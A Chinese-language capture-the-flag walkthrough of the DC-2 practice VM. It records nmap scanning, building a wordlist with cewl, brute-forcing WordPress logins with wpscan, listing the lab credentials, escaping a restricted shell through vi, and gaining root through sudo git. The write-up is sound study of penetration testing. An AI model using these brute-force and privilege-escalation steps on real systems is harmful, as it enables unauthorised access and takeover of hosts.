接着打靶场熟悉工具和渗透思路
主机发现
nmap先上来扫一扫内网网段
nmap -A 192.168.100.0/24
这个104就是dc-2靶机
服务发现
没看出来这个7744是个啥服务
查了一下
好像就是一个用来监控协议传输单元质量的?
不管它,先访问一下这个80
在主机探测的时候,看到了重定向,会定向到dc2这个域名
那就改一下本机hosts
/etc/hosts
1 | 192.168.100.104 dc-2 |
访问一下,打开网页,看到了一个flag的tab
说是要爆破,尝试密码,可能有多个帐号爆出来,有的帐号还没有下一个flag
爆破入后台
然后这里我懵了,看了其他师傅的博客才知道有个工具叫cewl
1 | 安装cewl |
题外话,这个时候就是kali方便了..工具自带
这是什么玄学问题???
还有我的cewl生成的字典也是空的…可能是环境的玄学问题..
?不知道咋回事
记录一下WPScan的使用参数
1 | –url 扫描网站 |
枚举用户名
wpscan --url http://dc-2 --enumerate u
爆破密码(将cewl爆出来的dict.txt密码和上一个枚举的用户名放入user.txt中)
wpscan --url http://dc-2/ -U users.txt -P dict.txt
我这里是没成功爆出来,因为wpscan扫不出来
cewl也是
jerry adipiscing提示了找别的入口
tom parturient使用7744登录ssh
拿到shell
cat,more不能用,
用vi在家目录下找到了这个flag3.txt
可怜的汤姆一直落后与杰瑞可能需要su来解决这个问题
汤姆杰瑞…我才发现这是猫和老鼠(不是
vi提权(切用户)
vi进入vi编辑界面你
:set shell=/bin/sh
:shell
进入shell之后修改环境变量输出
export PATH="/usr/sbin:/usr/bin:/rbin:/bin"
然后切换用户jerry
su jerry
输入刚才jerry的密码
find / -name flag4.txt
找到flag位置
git提权(root)
提示git提权
输入sudo git help config
在打开的手册界面!/bin/bash
前提是执行sudo -l 提示不需要密码可以使用git命令
找找最后的flag
find / -name *flag*